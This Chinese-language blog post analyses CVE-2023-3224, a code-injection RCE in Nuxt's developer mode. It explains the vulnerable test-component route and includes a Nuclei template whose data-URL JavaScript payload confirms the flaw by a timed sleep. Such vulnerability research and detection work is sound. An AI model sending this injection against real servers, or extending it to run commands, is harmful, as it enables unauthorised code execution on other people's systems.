https://nuxt.com/docs/examples/essentials/hello-world
照着这个创建文件,然后修改package.json里nuxt的版本号
1
2
3
4
5
6
7
8
9
10
11
12
|
{
"name": "example-hello-world",
"private": true,
"scripts": {
"build": "nuxi build",
"dev": "nuxi dev",
"start": "nuxi preview"
},
"devDependencies": {
"nuxt": "3.5.0"
}
}
|
https://github.com/nuxt/nuxt/commit/65a8f4eb3ef1b249a95fd59e323835a96428baff
如果服务器以dev模式运行并且请求的url以/__nuxt_component_test__/开头,那么引入#build/test-component-wrapper.mjs
在#build/test-component-wrapper.mjs中会截取query string然后import,造成rce。
poc
当引入child_process执行命令时,报错500
这个时候需要用node_modules里别的gadget。
编写模板时,要考虑怎么做验证,有的没办法执行命令,干脆用sleep延时来判断,然后发现nuxt在渲染时有缓存,如果两次payload一致时只会sleep一次,所以加了个随机数。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
id: CVE-2023-3224
info:
name: nuxt developer mode RCE
author: Y4er
severity: critical
description: |
RCE in developer mode in nuxt/nuxt
reference:
- https://huntr.dev/bounties/1eb74fd8-0258-4c1f-a904-83b52e373a87/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2023-3224
cwe-id: CWE-94
tags: cve,cve2023,rce,http,vmware
http:
- method: GET
path:
- "{{BaseURL}}/__nuxt_component_test__/?path=data:text/javascript,await%20new%20Promise(resolve%20=%3E%20setTimeout(resolve,%206000));console.log('{{randstr}}')"
req-condition: true
matchers:
- type: dsl
dsl:
- 'duration>=5'
|
https://huntr.dev/bounties/1eb74fd8-0258-4c1f-a904-83b52e373a87/
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。
